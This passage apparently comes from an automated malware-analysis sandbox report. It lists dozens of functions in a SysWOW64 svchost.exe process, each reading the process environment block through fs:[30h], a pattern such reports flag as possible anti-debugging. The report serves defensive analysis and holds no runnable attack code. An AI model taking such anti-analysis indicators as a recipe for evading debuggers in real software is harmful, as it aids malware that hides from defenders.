            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6030 mov eax, dword ptr fs:[00000030h]2_2_033C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]2_2_0332A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]2_2_0332C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]2_2_033B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D2000 mov eax, dword ptr fs:[00000030h]2_2_033D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]2_2_0335C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]2_2_03332050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033280A0 mov eax, dword ptr fs:[00000030h]2_2_033280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov ecx, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336273C mov eax, dword ptr fs:[00000030h]2_2_0336273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AC730 mov eax, dword ptr fs:[00000030h]2_2_033AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C720 mov eax, dword ptr fs:[00000030h]2_2_0336C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330710 mov eax, dword ptr fs:[00000030h]2_2_03330710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360710 mov eax, dword ptr fs:[00000030h]2_2_03360710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C700 mov eax, dword ptr fs:[00000030h]2_2_0336C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338770 mov eax, dword ptr fs:[00000030h]2_2_03338770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340770 mov eax, dword ptr fs:[00000030h]2_2_03340770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330750 mov eax, dword ptr fs:[00000030h]2_2_03330750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE75D mov eax, dword ptr fs:[00000030h]2_2_033BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372750 mov eax, dword ptr fs:[00000030h]2_2_03372750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4755 mov eax, dword ptr fs:[00000030h]2_2_033B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov esi, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336674D mov eax, dword ptr fs:[00000030h]2_2_0336674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033307AF mov eax, dword ptr fs:[00000030h]2_2_033307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E47A0 mov eax, dword ptr fs:[00000030h]2_2_033E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D678E mov eax, dword ptr fs:[00000030h]2_2_033D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033347FB mov eax, dword ptr fs:[00000030h]2_2_033347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033527ED mov eax, dword ptr fs:[00000030h]2_2_033527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE7E1 mov eax, dword ptr fs:[00000030h]2_2_033BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333C7C0 mov eax, dword ptr fs:[00000030h]2_2_0333C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B07C3 mov eax, dword ptr fs:[00000030h]2_2_033B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E627 mov eax, dword ptr fs:[00000030h]2_2_0334E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03366620 mov eax, dword ptr fs:[00000030h]2_2_03366620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368620 mov eax, dword ptr fs:[00000030h]2_2_03368620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333262C mov eax, dword ptr fs:[00000030h]2_2_0333262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372619 mov eax, dword ptr fs:[00000030h]2_2_03372619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE609 mov eax, dword ptr fs:[00000030h]2_2_033AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334260B mov eax, dword ptr fs:[00000030h]2_2_0334260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03362674 mov eax, dword ptr fs:[00000030h]2_2_03362674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F866E mov eax, dword ptr fs:[00000030h]2_2_033F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A660 mov eax, dword ptr fs:[00000030h]2_2_0336A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334C640 mov eax, dword ptr fs:[00000030h]2_2_0334C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033666B0 mov eax, dword ptr fs:[00000030h]2_2_033666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C6A6 mov eax, dword ptr fs:[00000030h]2_2_0336C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334690 mov eax, dword ptr fs:[00000030h]2_2_03334690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE6F2 mov eax, dword ptr fs:[00000030h]2_2_033AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B06F1 mov eax, dword ptr fs:[00000030h]2_2_033B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A6C7 mov eax, dword ptr fs:[00000030h]2_2_0336A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340535 mov eax, dword ptr fs:[00000030h]2_2_03340535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E53E mov eax, dword ptr fs:[00000030h]2_2_0335E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6500 mov eax, dword ptr fs:[00000030h]2_2_033C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404500 mov eax, dword ptr fs:[00000030h]2_2_03404500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336656A mov eax, dword ptr fs:[00000030h]2_2_0336656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338550 mov eax, dword ptr fs:[00000030h]2_2_03338550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033545B1 mov eax, dword ptr fs:[00000030h]2_2_033545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B05A7 mov eax, dword ptr fs:[00000030h]2_2_033B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E59C mov eax, dword ptr fs:[00000030h]2_2_0336E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov eax, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332582 mov ecx, dword ptr fs:[00000030h]2_2_03332582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364588 mov eax, dword ptr fs:[00000030h]2_2_03364588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E5E7 mov eax, dword ptr fs:[00000030h]2_2_0335E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033325E0 mov eax, dword ptr fs:[00000030h]2_2_033325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C5ED mov eax, dword ptr fs:[00000030h]2_2_0336C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033365D0 mov eax, dword ptr fs:[00000030h]2_2_033365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A5D0 mov eax, dword ptr fs:[00000030h]2_2_0336A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E5CF mov eax, dword ptr fs:[00000030h]2_2_0336E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A430 mov eax, dword ptr fs:[00000030h]2_2_0336A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]2_2_0332C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]2_2_033BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]2_2_033EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]2_2_0332645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]2_2_0335245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]2_2_0336E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]2_2_033644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]2_2_033BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]2_2_033364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]2_2_033EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]2_2_033304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404B00 mov eax, dword ptr fs:[00000030h]2_2_03404B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]2_2_0332CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328B50 mov eax, dword ptr fs:[00000030h]2_2_03328B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]2_2_033DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]2_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]2_2_033D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
